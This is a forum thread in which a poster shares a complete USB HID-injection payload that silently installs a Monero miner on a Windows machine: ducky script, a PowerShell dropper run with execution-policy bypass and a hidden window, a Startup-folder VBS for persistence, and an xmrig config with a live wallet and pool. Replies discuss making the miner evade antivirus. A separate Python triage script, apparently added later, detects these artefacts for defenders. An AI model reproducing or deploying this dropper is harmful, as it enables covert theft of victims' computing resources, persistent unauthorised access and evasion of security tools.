icarus255 Posted October 3, 2018

My first payload for the BB ?

I just wanted to start off by saying that I don't have a background in IT, I'm just an enthusiast. I did this really just to get more familiar with scripting and security, so I welcome any comments/criticisms. I should note that Ar1k88 posted mining payloads sometime ago so creds to him for the original idea. I ended up writing my own scripts rather than editing his ones and made some improvements e.g. combining the CPU and GPU miners into one payload, adding persistence, silent mode, etc. Some notes below if you care:

Silent Mode

You can set the miners to run in the background by editing the startup.vbs script and change "1" to "0" on line 3 & 4 or change the .json config file line 11 from "false" to "true". The CPU usage is also editable in the config file so you can set it to a lower value and avoid visibly slowing down the host's performance (at the expense of the hash rate). Once you execute the GPU miner, the computer will become almost non-responsive so definitely noticeable.

Persistence

I liked the idea of a VB script that runs on every startup which then subsequently initiates the miners. Windows of course didn't like the idea of running scripts (I don't know if this is a default security setting) but adding the vbs file as an exception to the execution policy seems to have fixed that (reference line 16 of run.ps1).

Instructions

You will need to download the xmrig binaries (or compile from source). Your browser and/or AV will most likely try to block the downloads. Windows Defender doesn't seem to mind though.

https://github.com/xmrig/xmrig/releases
https://github.com/xmrig/xmrig-nvidia (sorry I forgot to add AMD support but it's getting late and I have work tomorrow)

Copy the downloaded exe files (xmrig.exe and xmrig-nvidia.exe) and the following files into switch 2 folder in BB:

payload.txt

```
# Title: Silent Monero Miner (with persistence)
# Description: Monero CPU miner (https://github.com/xmrig), copies the miner and config files to local disk, and adds a script to startup
# Author: icarus255
# Props: 0dyss3us (KeenanV) - I like his idea of adding the VB script to startup
# Version: 1.0
# Category: Mining
# Target: Windows 10
# Attackmodes: HID, Storage
# Comments: You will need to download the binaries from (https://github.com/xmrig/) or compile from source
# Silent mode: You can start in silent mode (background) by changing config.json line 16: "background": false, -> "background": true,

#Setup
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION

#Wait for drive recognition
Q delay 4500

#Run the Powershell script starts the miners, copies the files to local disk, and adds to startup.
LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"

LED FINISH
```

run.ps1

```
$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
$user= $env:UserName
$cpuminer = $Drive + "payloads\switch2\xmrig.exe"
$configfile = $Drive + "payloads\switch2\config.json"
$startupscript = $Drive + "payloads\switch2\startup.vbs"
$nvidiaminer = $Drive + "payloads\switch2\xmrig-nvidia.exe"
$StartupFolder = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
$LocalFolder = ("C:\MoneroTest")

Set-Location -Path $Drive + "payloads\switch2"
copy-item -Path $cpuminer -Destination (new-item -type directory $LocalFolder) -force -ea 0
copy-item $configfile -Destination $LocalFolder
copy-item $nvidiaminer -Deistnation $LocalFolder
copy-item $startupscript -Destination $StartupFolder
Unblock-File -Path $StartupFolder + "startup.vbs"
Set-Location -Path $StartupFolder
Start-Process cmd -ArgumentList "/c start startup.vbs"
```

config.json

```
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 5,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 75,
    "pools": [
        {
            "url": "pool.minexmr.com:4444",
            "user": "424MefYkUWB16pj42Fcsu1DVeGyywsoeY96oQkLcokoKSU2WyywLNdRXj2ms7y2JQk7c4QpTtsxZsdspHbWiwzc91rbBCjL",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}
```

startup.vbs

```
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.shell")
WshShell.Run "powershell.exe C:\MoneroTest\xmrig.exe", 1, False
WshShell.Run "powershell.exe C:\MoneroTest\xmrig-nvidia.exe", 1, False
```
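Read from the responder's side, the post above relies on two host artefacts: a .vbs dropped into the per-user Startup folder whose WshShell.Run call launches an executable (window style 0 making it invisible), and an xmrig-style config.json whose "background" and "max-cpu-usage" keys keep the miner quiet. The Python triage script below is an added example and is not the poster's code; it parses both artefacts and flags those indicators. The sample file contents, the MINER_NAME_HINTS list, the pool host and the wallet placeholder are all constructed for the example, and the helper names (analyse_vbs, inspect_miner_config, scan_startup_folder) are assumptions of this example rather than anything from the thread.

```python
"""Triage helper for Startup-folder .vbs launchers and miner config files.
Added example, not the poster's code.  The sample contents below are
constructed so the script runs offline; point scan_startup_folder() at a real
Startup folder and inspect_miner_config() at a real config.json to use it."""
from __future__ import annotations

import json
import re
from pathlib import Path

# Matches  WshShell.Run "<command>", <window style>, <wait>  in VBScript.
# Window style 0 means the launched window is hidden; 1 is a normal window.
_RUN_RE = re.compile(
    r'\.Run\s+"(?P<cmd>[^"]*)"\s*,\s*(?P<style>\d+)\s*,\s*(?P<wait>True|False)',
    re.IGNORECASE,
)

# Constructed list of substrings that mark a launched binary as a miner.
MINER_NAME_HINTS = ("xmrig", "miner")

# Per-user Startup folder, relative to the user's profile directory.
STARTUP_SUBPATH = Path("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")


def analyse_vbs(text: str) -> list[dict]:
    """Return one finding per Run call, flagging hidden windows and launches
    of binaries that live outside Program Files / Windows."""
    findings = []
    for m in _RUN_RE.finditer(text):
        cmd = m.group("cmd")
        hidden = m.group("style") == "0"
        # The last token is the target binary (after any interpreter prefix).
        tokens = cmd.split()
        target = tokens[-1] if tokens else ""
        miner_name = any(h in target.lower() for h in MINER_NAME_HINTS)
        outside_program_files = not target.lower().startswith(
            ("c:\\program files", "c:\\windows")
        )
        findings.append({
            "command": cmd,
            "hidden_window": hidden,
            "miner_name_hint": miner_name,
            "outside_program_files": outside_program_files,
            "suspicious": miner_name or (hidden and outside_program_files),
        })
    return findings


def inspect_miner_config(text: str) -> dict:
    """Extract the silent-mode and throttling settings from an xmrig-style
    config.json, plus the pool endpoints a responder would want to block."""
    cfg = json.loads(text)
    pools = [p.get("url", "") for p in cfg.get("pools", [])]
    return {
        "background": bool(cfg.get("background", False)),
        "max_cpu_usage": cfg.get("max-cpu-usage"),
        "pools": pools,
        "looks_like_miner": "algo" in cfg and bool(pools),
    }


def scan_startup_folder(folder: Path) -> list[dict]:
    """Analyse every .vbs file found in a Startup folder on disk."""
    results = []
    for vbs in folder.glob("*.vbs"):
        for finding in analyse_vbs(vbs.read_text(errors="replace")):
            finding["file"] = str(vbs)
            results.append(finding)
    return results


# Constructed samples mirroring the artefact shapes discussed in the thread.
SAMPLE_VBS = '''Dim WshShell
Set WshShell = WScript.CreateObject("WScript.shell")
WshShell.Run "powershell.exe C:\\MoneroTest\\xmrig.exe", 0, False
'''
SAMPLE_CONFIG = (
    '{"algo": "cryptonight", "background": true, "max-cpu-usage": 50, '
    '"pools": [{"url": "pool.example.invalid:4444", "user": "WALLET_PLACEHOLDER"}]}'
)

if __name__ == "__main__":
    for finding in analyse_vbs(SAMPLE_VBS):
        print(finding)
    print(inspect_miner_config(SAMPLE_CONFIG))
```

On a live host the same checks map onto a Startup-folder file-creation alert plus a process-creation rule for wscript.exe or cscript.exe spawning powershell.exe from a user-writable path; the pool host from the config is the network indicator to block and hunt for.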
MrMyFriend Posted January 16, 2019

Hi Icarus! Some time ago while I was giving a look to Ar1k88's payload I had your same idea! I'm also just an IT enthusiast, with a completely unrelated job to this environment, but I find your payload very interesting. Congrats! I can't wait to have some free time to check it out.
9ShadesLeft Posted January 17, 2019

For those of us (me) who are new to this stuff. What is a CPU / GPU miner? I would assume for something either for Zombifying a PC or Bitcoin mining? Beyond that, I have no clue! Thank you for dealing with my being naive!
icarus255 Posted February 16, 2019 (Author)

On 1/17/2019 at 1:42 PM, 9ShadesLeft said:
> For those of us (me) who are new to this stuff. What is a CPU / GPU miner? I would assume for something either for Zombifying a PC or Bitcoin mining? Beyond that, I have no clue! Thank you for dealing with my being naive!

Mining can refer to any sort of crypto mining but in this instance we are mining Monero. Monero is a good choice because it's impossible to trace (or so they say) and you can mine it with a CPU. I wrote this for fun and when crypto mining was the cool thing to do. I would still like to figure out how to crypt the miner so the AV doesn't pick it up but don't hold your breath for that one 😉
MrMyFriend Posted February 18, 2019

I was kind of busy in the last period, but still looking forward to giving this a try at the end of this or next week. Making the miner AV undetectable will definitely be the next thing to do.
icarus255 Posted February 18, 2019 (Author)

5 minutes ago, MrMyFriend said:
> I was kind of busy in the last period, but still looking forward to giving this a try at the end of this or next week. Making the miner AV undetectable will definitely be the next thing to do.

Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge. Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂
spamman63 Posted April 16, 2019

I've been testing the script on my PC and it seems to get jammed when it tries to open startup.vbs, giving the message "Windows cannot find 'startup.vbs'. Make sure you typed the name correctly, and then try again." Send help
Jack823933 Posted August 27, 2021

On 2/18/2019 at 9:39 AM, icarus255 said:
> Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge. Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂

still waiting for it bro 😢
Archived: This topic is now archived and is closed to further replies.